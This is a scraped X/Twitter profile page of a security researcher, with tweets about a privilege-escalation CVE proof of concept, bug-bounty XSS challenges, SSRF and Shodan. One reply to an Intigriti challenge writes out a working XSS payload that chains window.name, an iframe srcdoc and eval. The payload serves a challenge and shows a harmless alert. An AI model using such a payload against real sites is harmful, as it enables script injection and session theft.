Marek Geleta

40 posts

Marek Geleta banner
Marek Geleta

Marek Geleta

@marek_geleta

Slovak Republic เข้าร่วม Nisan 2016
96 กำลังติดตาม147 ผู้ติดตาม
Marek Geleta
Marek Geleta@marek_geleta·
🚨 PoC for CVE-2024-48990 Local Privilege Escalation Released 🚨 I've published a PoC for CVE-2024-48990, a local privilege escalation vulnerability in `needupdate` (pre-installed in Ubuntu Server 21.04+) github.com/makuga01/CVE-2…
English
0
0
0
135
Marek Geleta
Marek Geleta@marek_geleta·
@intigriti JS on controlled web: window.name='alert(document.domain)' window.location=`http://vulnerable_.com/?<iframe/srcdoc="<a/id=debug%20href=g:eval(parent.name)><script/src=easy-eval.js></script>">`
English
2
0
0
78
Intigriti
Intigriti@intigriti·
Can you spot the vulnerability? 🔎 Show us how you'd pop an alert(document.domain) in the comments 👇 The shortest payload gets a 25€ SWAG voucher! 🎫
Intigriti tweet media
English
38
71
492
139.7K
Marek Geleta รีทวีตแล้ว
yakuhito🌱
yakuhito🌱@yakuhito·
yakuhito🌱 tweet media
ZXX
2
5
13
2.3K
Marek Geleta รีทวีตแล้ว
Jan Masarik
Jan Masarik@s14ve·
🎉 We've finally released my blog, which is now kinda redundant to an excellent Defcon talk by @matter_of_cat and @InsecureNature. Luckily, there are a few additional bits of information there, so if you're interested in GCP Security, check it out! code.kiwi.com/towards-secure…
English
0
9
15
0
BugPoC
BugPoC@bugpoc_official·
XSS Challenge Hint #2 gotta verify that origin
GIF
English
8
1
18
0
h43z
h43z@h43z·
ctf4.43z.one be the first to solve this challenge! Objective: Show XSS in the name parameter
English
2
2
4
0
Shodan
Shodan@shodanhq·
Are you a student, professor or work at a University? Register with your academic email to receive a free upgrade: buff.ly/2fC0W9Q
English
13
38
59
0
Marek Geleta
Marek Geleta@marek_geleta·
@0ktavandi The blind ssrfs thing really depends from target to target. Sometimes you might just be able to enumerate internal ports and sometimes you can even get rce but it really depends and it's probably much harder to exploit than "classic" ssrf
English
1
0
0
0
m0z
m0z@LooseSecurity·
Does anyone know a good implementation of end-to-end encryption for group chats? I've heard OMEMO works, can someone explain the key exchange and how it's verified that no other parties can access it?
English
3
0
8
0
Shodan
Shodan@shodanhq·
@marek_geleta yes, but it's a bit more complicated. You'll need to send some verifiable proof to academic@shodan.io if your school doesn't provide you with an email address
English
2
0
0
0